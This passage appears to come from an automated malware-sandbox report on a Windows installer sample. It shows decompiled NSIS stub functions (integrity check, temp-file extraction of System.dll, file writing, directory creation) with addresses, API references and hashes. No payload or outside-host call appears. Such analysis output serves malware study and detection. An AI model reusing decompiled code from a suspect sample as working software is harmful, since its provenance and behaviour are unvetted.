					E004030B3( *0x40b0d8);
					if(E00403081( &_a4, 4) == 0 || _v12 != _a4) {
						goto L29;
					} else {
						goto L28;
					}
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x423f54) & 0x00007e00) + 0x200;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403081(0x4170e8, _t90); // executed
						if(_t71 == 0) {
							E00402BF1(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x423f54 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402BF1(0);
							}
							goto L20;
						}
						E00405830( &_v44, 0x4170e8, 0x1c);
						_t77 = _v44;
						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
							_a4 = _a4 | _t77;
							_t87 =  *0x40b0d8; // 0x8600
							 *0x423fe0 =  *0x423fe0 | _a4 & 0x00000002;
							_t80 = _v20;
							 *0x423f54 = _t87;
							if(_t80 > _t93) {
								goto L29;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v8 = _v8 + 1;
								_t93 = _t80 - 4;
								if(_t90 > _t93) {
									_t90 = _t93;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t93 <  *0x41f0e8) {
							_v12 = E00405F97(_v12, 0x4170e8, _t90);
						}
						 *0x40b0d8 =  *0x40b0d8 + _t90;
						_t93 = _t93 - _t90;
					} while (_t93 > 0);
					_t82 = 0;
					goto L24;
				}
			}






























                                                                                                                          0x00402c5d
                                                                                                                          0x00402c60
                                                                                                                          0x00402c63
                                                                                                                          0x00402c66
                                                                                                                          0x00402c6c
                                                                                                                          0x00402c7d
                                                                                                                          0x00402c82
                                                                                                                          0x00402c95
                                                                                                                          0x00402c9a
                                                                                                                          0x00402c9d
                                                                                                                          0x00402ca3
                                                                                                                          0x00000000
                                                                                                                          0x00402ca5
                                                                                                                          0x00402cb0
                                                                                                                          0x00402cb6
                                                                                                                          0x00402cc7
                                                                                                                          0x00402cce
                                                                                                                          0x00402cd6
                                                                                                                          0x00402cdb
                                                                                                                          0x00402cdd
                                                                                                                          0x00402dca
                                                                                                                          0x00402dcc
                                                                                                                          0x00402dd8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402ddd
                                                                                                                          0x00402e01
                                                                                                                          0x00402e06
                                                                                                                          0x00402e0c
                                                                                                                          0x00402e17
                                                                                                                          0x00402e1c
                                                                                                                          0x00402e1f
                                                                                                                          0x00402e20
                                                                                                                          0x00402e21
                                                                                                                          0x00402e23
                                                                                                                          0x00402e2b
                                                                                                                          0x00402e42
                                                                                                                          0x00402e4a
                                                                                                                          0x00402e4f
                                                                                                                          0x00402e51
                                                                                                                          0x00402e51
                                                                                                                          0x00402e59
                                                                                                                          0x00402e59
                                                                                                                          0x00402e5c
                                                                                                                          0x00402e5d
                                                                                                                          0x00402e5d
                                                                                                                          0x00402e60
                                                                                                                          0x00402e62
                                                                                                                          0x00402e62
                                                                                                                          0x00402e6c
                                                                                                                          0x00402e72
                                                                                                                          0x00402e80
                                                                                                                          0x00000000
                                                                                                                          0x00402e85
                                                                                                                          0x00000000
                                                                                                                          0x00402e2b
                                                                                                                          0x00402de5
                                                                                                                          0x00402df7
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402ce3
                                                                                                                          0x00402ce8
                                                                                                                          0x00402ced
                                                                                                                          0x00402cf1
                                                                                                                          0x00402cf8
                                                                                                                          0x00402cff
                                                                                                                          0x00402d01
                                                                                                                          0x00402d01
                                                                                                                          0x00402d05
                                                                                                                          0x00402d0c
                                                                                                                          0x00402e36
                                                                                                                          0x00402e2d
                                                                                                                          0x00000000
                                                                                                                          0x00402e2d
                                                                                                                          0x00402d19
                                                                                                                          0x00402d99
                                                                                                                          0x00402d9d
                                                                                                                          0x00402da2
                                                                                                                          0x00000000
                                                                                                                          0x00402d99
                                                                                                                          0x00402d22
                                                                                                                          0x00402d27
                                                                                                                          0x00402d2f
                                                                                                                          0x00402d55
                                                                                                                          0x00402d5b
                                                                                                                          0x00402d64
                                                                                                                          0x00402d6a
                                                                                                                          0x00402d6f
                                                                                                                          0x00402d75
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402d7f
                                                                                                                          0x00402d87
                                                                                                                          0x00402d8a
                                                                                                                          0x00402d8f
                                                                                                                          0x00402d91
                                                                                                                          0x00402d91
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402d7f
                                                                                                                          0x00402da3
                                                                                                                          0x00402da9
                                                                                                                          0x00402db5
                                                                                                                          0x00402db5
                                                                                                                          0x00402db8
                                                                                                                          0x00402dbe
                                                                                                                          0x00402dc0
                                                                                                                          0x00402dc8
                                                                                                                          0x00000000
                                                                                                                          0x00402dc8

                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 00402C66
                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\PQMW0W5h3X.exe,00000400), ref: 00402C82
                                                                                                                            • Part of subcall function 0040586F: GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\PQMW0W5h3X.exe,80000000,00000003), ref: 00405873
                                                                                                                            • Part of subcall function 0040586F: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PQMW0W5h3X.exe,C:\Users\user\Desktop\PQMW0W5h3X.exe,80000000,00000003), ref: 00402CCE
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                          • String ID: "C:\Users\user\Desktop\PQMW0W5h3X.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PQMW0W5h3X.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$pA
                                                                                                                          • API String ID: 4283519449-1101747074
                                                                                                                          • Opcode ID: d74ddf077dad9ccce0d63da47009af9ced08a9d3a58e0b3746407ee1fc4199ad
                                                                                                                          • Instruction ID: 62828f2e2b01cd2e9021f71d1007b468b6294b04ed91f3cf43b909f99e7c5814
                                                                                                                          • Opcode Fuzzy Hash: d74ddf077dad9ccce0d63da47009af9ced08a9d3a58e0b3746407ee1fc4199ad
                                                                                                                          • Instruction Fuzzy Hash: C151E371E00214ABDB209F64DE89B9E7BB4EF04355F20403BF904B62D1C7BC9E458A9D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00401751, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 60%
                                                                                                                          			E00401751(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402A29(0x31);
				 *(_t85 - 0xc) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E004056F8(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E0040568B(E00405B98(0x409c10, "C:\\Users\\engineer\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409c10);
					E00405B98();
				}
				E00405DFA(0x409c10);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405E93(0x409c10);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405850(0x409c10);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040586F(0x409c10, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404E84(0xffffffe2,  *(_t85 - 0xc));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423fc8;
						goto L32;
					} else {
						E00405B98(0x40a410, 0x425000);
						E00405B98(0x425000, 0x409c10);
						E00405BBA(_t75, 0x40a410, 0x409c10, "C:\Users\engineer\AppData\Local\Temp\nsgB979.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00405B98(0x425000, 0x40a410);
						_t62 = E00405459("C:\Users\engineer\AppData\Local\Temp\nsgB979.tmp\System.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423fc8 =  &( *0x423fc8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c10);
								_push(0xfffffffa);
								E00404E84();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404E84(0xffffffea,  *(_t85 - 0xc));
				 *0x423ff4 =  *0x423ff4 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 8));
				_push( *((intOrPtr*)(_t85 - 0x20)));
				_t43 = E00402E8E(); // executed
				 *0x423ff4 =  *0x423ff4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 8)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405BBA(_t75, _t80, 0x409c10, 0x409c10, 0xffffffee);
					} else {
						E00405BBA(_t75, _t80, 0x409c10, 0x409c10, 0xffffffe9);
						lstrcatA(0x409c10,  *(_t85 - 0xc));
					}
					_push(0x200010);
					_push(0x409c10);
					E00405459();
					goto L29;
				}
				goto L33;
			}
















                                                                                                                          0x00401751
                                                                                                                          0x00401758
                                                                                                                          0x00401761
                                                                                                                          0x00401764
                                                                                                                          0x00401767
                                                                                                                          0x0040176c
                                                                                                                          0x00401774
                                                                                                                          0x00401790
                                                                                                                          0x00401776
                                                                                                                          0x00401776
                                                                                                                          0x00401777
                                                                                                                          0x00401777
                                                                                                                          0x00401796
                                                                                                                          0x004017a0
                                                                                                                          0x004017a0
                                                                                                                          0x004017a4
                                                                                                                          0x004017a7
                                                                                                                          0x004017ac
                                                                                                                          0x004017ae
                                                                                                                          0x004017b0
                                                                                                                          0x004017b5
                                                                                                                          0x004017b5
                                                                                                                          0x004017c0
                                                                                                                          0x004017c0
                                                                                                                          0x004017d1
                                                                                                                          0x004017d3
                                                                                                                          0x004017d3
                                                                                                                          0x004017d4
                                                                                                                          0x004017d4
                                                                                                                          0x004017d7
                                                                                                                          0x004017da
                                                                                                                          0x004017dd
                                                                                                                          0x004017dd
                                                                                                                          0x004017e4
                                                                                                                          0x004017f3
                                                                                                                          0x004017f8
                                                                                                                          0x004017fb
                                                                                                                          0x004017fe
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00401800
                                                                                                                          0x00401803
                                                                                                                          0x0040185d
                                                                                                                          0x00401862
                                                                                                                          0x004015a8
                                                                                                                          0x0040268f
                                                                                                                          0x0040268f
                                                                                                                          0x004028be
                                                                                                                          0x004028c1
                                                                                                                          0x004028c1
                                                                                                                          0x00000000
                                                                                                                          0x00401805
                                                                                                                          0x0040180b
                                                                                                                          0x00401816
                                                                                                                          0x00401823
                                                                                                                          0x0040182e
                                                                                                                          0x00401844
                                                                                                                          0x00401844
                                                                                                                          0x00401847
                                                                                                                          0x00000000
                                                                                                                          0x0040184d
                                                                                                                          0x0040184d
                                                                                                                          0x0040184e
                                                                                                                          0x0040186b
                                                                                                                          0x004028c7
                                                                                                                          0x004028c7
                                                                                                                          0x004028c7
                                                                                                                          0x00401850
                                                                                                                          0x00401850
                                                                                                                          0x00401851
                                                                                                                          0x00401492
                                                                                                                          0x00402241
                                                                                                                          0x00402241
                                                                                                                          0x00402241
                                                                                                                          0x0040184e
                                                                                                                          0x00401847
                                                                                                                          0x004028c9
                                                                                                                          0x004028cd
                                                                                                                          0x004028cd
                                                                                                                          0x0040187b
                                                                                                                          0x00401880
                                                                                                                          0x00401886
                                                                                                                          0x00401887
                                                                                                                          0x00401888
                                                                                                                          0x0040188b
                                                                                                                          0x0040188e
                                                                                                                          0x00401893
                                                                                                                          0x00401899
                                                                                                                          0x0040189d
                                                                                                                          0x0040189f
                                                                                                                          0x004018a7
                                                                                                                          0x004018b3
                                                                                                                          0x004018a1
                                                                                                                          0x004018a1
                                                                                                                          0x004018a5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004018a5
                                                                                                                          0x004018bc
                                                                                                                          0x004018c2
                                                                                                                          0x004018c4
                                                                                                                          0x00000000
                                                                                                                          0x004018ca
                                                                                                                          0x004018ca
                                                                                                                          0x004018cd
                                                                                                                          0x004018e5
                                                                                                                          0x004018cf
                                                                                                                          0x004018d2
                                                                                                                          0x004018db
                                                                                                                          0x004018db
                                                                                                                          0x004018ea
                                                                                                                          0x004018ef
                                                                                                                          0x0040223c
                                                                                                                          0x00000000
                                                                                                                          0x0040223c
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401790
                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BA
                                                                                                                            • Part of subcall function 00405B98: lstrcpynA.KERNEL32(?,?,00000400,004031A9,00423740,NSIS Error), ref: 00405BA5
                                                                                                                            • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                                                                                                            • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                                                                                                            • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                                                                                                            • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                                                                                                            • Part of subcall function 00404E84: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F18
                                                                                                                            • Part of subcall function 00404E84: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F32
                                                                                                                            • Part of subcall function 00404E84: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F40
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsgB979.tmp$C:\Users\user\AppData\Local\Temp\nsgB979.tmp\System.dll$Call
                                                                                                                          • API String ID: 1941528284-3257874629
                                                                                                                          • Opcode ID: 1d83eeb157989370eef6aca95033163bd7760edd2b6c2f47f904ee0373184e1d
                                                                                                                          • Instruction ID: ec6d4e4deed358595fa2340d5a7c786697911580d52a45c2a3a5a43c8a45cd53
                                                                                                                          • Opcode Fuzzy Hash: 1d83eeb157989370eef6aca95033163bd7760edd2b6c2f47f904ee0373184e1d
                                                                                                                          • Instruction Fuzzy Hash: 1C41E531900515BADF107FB5CC45EAF3679EF02329B60863BF425F10E2D67C9A418A6E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00402E8E, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 166fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 94%
                                                                                                                          			E00402E8E(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				signed int _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				char _v88;
				void* _t62;
				void* _t63;
				intOrPtr _t74;
				long _t75;
				int _t78;
				void* _t88;
				void* _t93;
				long _t96;
				signed int _t97;
				long _t98;
				int _t99;
				void* _t100;
				long _t101;
				void* _t102;

				_t97 = _a16;
				_t93 = _a12;
				_v12 = _t97;
				if(_t93 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_t88 = _t93;
				if(_t93 == 0) {
					_t88 = 0x40f0e0;
				}
				_t60 = _a4;
				if(_a4 >= 0) {
					E004030B3( *0x423f98 + _t60);
				}
				_t62 = E00403081( &_a16, 4); // executed
				if(_t62 == 0) {
					L34:
					_push(0xfffffffd);
					goto L35;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t93 == 0) {
							while(_a16 > 0) {
								_t98 = _v12;
								if(_a16 < _t98) {
									_t98 = _a16;
								}
								if(E00403081(0x40b0e0, _t98) == 0) {
									goto L34;
								} else {
									if(WriteFile(_a8, 0x40b0e0, _t98,  &_a12, 0) == 0 || _t98 != _a12) {
										L29:
										_push(0xfffffffe);
										L35:
										_pop(_t63);
										return _t63;
									} else {
										_v8 = _v8 + _t98;
										_a16 = _a16 - _t98;
										continue;
									}
								}
							}
							L45:
							return _v8;
						}
						if(_a16 < _t97) {
							_t97 = _a16;
						}
						if(E00403081(_t93, _t97) != 0) {
							_v8 = _t97;
							goto L45;
						} else {
							goto L34;
						}
					}
					_v16 = GetTickCount();
					E00406005(0x40b050);
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L45;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E00403081(0x40b0e0, _t99) == 0) {
							goto L34;
						}
						_a16 = _a16 - _t99;
						 *0x40b068 = 0x40b0e0;
						 *0x40b06c = _t99;
						while(1) {
							 *0x40b070 = _t88;
							 *0x40b074 = _v12; // executed
							_t74 = E00406025(0x40b050); // executed
							_v24 = _t74;
							if(_t74 < 0) {
								break;
							}
							_t100 =  *0x40b070; // 0x40f0e0
							_t101 = _t100 - _t88;
							_t75 = GetTickCount();
							_t96 = _t75;
							if(( *0x423ff4 & 0x00000001) != 0 && (_t75 - _v16 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E00404E84(0,  &_v88);
								_v16 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L45;
							} else {
								if(_a12 != 0) {
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_t88 =  *0x40b070; // 0x40f0e0
									L24:
									if(_v24 != 1) {
										continue;
									}
									goto L45;
								}
								_t78 = WriteFile(_a8, _t88, _t101,  &_v20, 0); // executed
								if(_t78 == 0 || _v20 != _t101) {
									goto L29;
								} else {
									_v8 = _v8 + _t101;
									goto L24;
								}
							}
						}
						_push(0xfffffffc);
						goto L35;
					}
					goto L34;
				}
			}























                                                                                                                          0x00402e96
                                                                                                                          0x00402e9a
                                                                                                                          0x00402e9d
                                                                                                                          0x00402ea2
                                                                                                                          0x00402ea4
                                                                                                                          0x00402ea4
                                                                                                                          0x00402eab
                                                                                                                          0x00402eaf
                                                                                                                          0x00402eb3
                                                                                                                          0x00402eb5
                                                                                                                          0x00402eb5
                                                                                                                          0x00402eba
                                                                                                                          0x00402ebf
                                                                                                                          0x00402eca
                                                                                                                          0x00402eca
                                                                                                                          0x00402ed5
                                                                                                                          0x00402edc
                                                                                                                          0x0040302c
                                                                                                                          0x0040302c
                                                                                                                          0x00000000
                                                                                                                          0x00402ee2
                                                                                                                          0x00402ee6
                                                                                                                          0x00403017
                                                                                                                          0x0040306c
                                                                                                                          0x00403031
                                                                                                                          0x00403037
                                                                                                                          0x00403039
                                                                                                                          0x00403039
                                                                                                                          0x0040304a
                                                                                                                          0x00000000
                                                                                                                          0x0040304c
                                                                                                                          0x0040305f
                                                                                                                          0x00403011
                                                                                                                          0x00403011
                                                                                                                          0x0040302e
                                                                                                                          0x0040302e
                                                                                                                          0x00000000
                                                                                                                          0x00403066
                                                                                                                          0x00403066
                                                                                                                          0x00403069
                                                                                                                          0x00000000
                                                                                                                          0x00403069
                                                                                                                          0x0040305f
                                                                                                                          0x0040304a
                                                                                                                          0x00403077
                                                                                                                          0x00000000
                                                                                                                          0x00403077
                                                                                                                          0x0040301c
                                                                                                                          0x0040301e
                                                                                                                          0x0040301e
                                                                                                                          0x0040302a
                                                                                                                          0x00403074
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040302a
                                                                                                                          0x00402ef7
                                                                                                                          0x00402efa
                                                                                                                          0x00402eff
                                                                                                                          0x00402eff
                                                                                                                          0x00402f09
                                                                                                                          0x00402f0c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402f12
                                                                                                                          0x00402f12
                                                                                                                          0x00402f12
                                                                                                                          0x00402f1a
                                                                                                                          0x00402f1c
                                                                                                                          0x00402f1c
                                                                                                                          0x00402f2d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402f33
                                                                                                                          0x00402f36
                                                                                                                          0x00402f3c
                                                                                                                          0x00402f42
                                                                                                                          0x00402f4a
                                                                                                                          0x00402f50
                                                                                                                          0x00402f55
                                                                                                                          0x00402f5c
                                                                                                                          0x00402f5f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402f65
                                                                                                                          0x00402f6b
                                                                                                                          0x00402f6d
                                                                                                                          0x00402f7a
                                                                                                                          0x00402f7c
                                                                                                                          0x00402faa
                                                                                                                          0x00402fb0
                                                                                                                          0x00402fb9
                                                                                                                          0x00402fbe
                                                                                                                          0x00402fbe
                                                                                                                          0x00402fc5
                                                                                                                          0x00403005
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402fc7
                                                                                                                          0x00402fca
                                                                                                                          0x00402fea
                                                                                                                          0x00402fed
                                                                                                                          0x00402ff0
                                                                                                                          0x00402ff6
                                                                                                                          0x00402ffa
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403000
                                                                                                                          0x00402fd6
                                                                                                                          0x00402fde
                                                                                                                          0x00000000
                                                                                                                          0x00402fe5
                                                                                                                          0x00402fe5
                                                                                                                          0x00000000
                                                                                                                          0x00402fe5
                                                                                                                          0x00402fde
                                                                                                                          0x00402fc5
                                                                                                                          0x0040300d
                                                                                                                          0x00000000
                                                                                                                          0x0040300d
                                                                                                                          0x00000000
                                                                                                                          0x00402f12

                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 00402EEC
                                                                                                                          • GetTickCount.KERNEL32 ref: 00402F6D
                                                                                                                          • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F9A
                                                                                                                          • wsprintfA.USER32 ref: 00402FAA
                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,0040F0E0,00000000,00000000), ref: 00402FD6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: CountTick$FileWritewsprintf
                                                                                                                          • String ID: ... %d%%
                                                                                                                          • API String ID: 4209647438-2449383134
                                                                                                                          • Opcode ID: b944acebcfd11712949cb6564d56ed346294539165133d47b9c6a5aca850bb39
                                                                                                                          • Instruction ID: 896dd5a5e80e39cb813739a9bcc38eeef40bacba50e05a76af68061f47ce39f0
                                                                                                                          • Opcode Fuzzy Hash: b944acebcfd11712949cb6564d56ed346294539165133d47b9c6a5aca850bb39
                                                                                                                          • Instruction Fuzzy Hash: 13518A3190120AABDF10DF65DA04AAF7BB8EB00395F14413BFD11B62C4D7789E41CBAA
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00405346, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405346(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x40735c;
				_v36.Group = 0x40735c;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x40734c;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                                                                                          0x00405351
                                                                                                                          0x00405355
                                                                                                                          0x00405358
                                                                                                                          0x0040535e
                                                                                                                          0x00405362
                                                                                                                          0x00405366
                                                                                                                          0x0040536e
                                                                                                                          0x00405375
                                                                                                                          0x0040537b
                                                                                                                          0x00405382
                                                                                                                          0x00405389
                                                                                                                          0x00405391
                                                                                                                          0x00405393
                                                                                                                          0x00000000
                                                                                                                          0x00405393
                                                                                                                          0x0040539d
                                                                                                                          0x004053a4
                                                                                                                          0x004053ba
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004053bc
                                                                                                                          0x004053c0

                                                                                                                          APIs
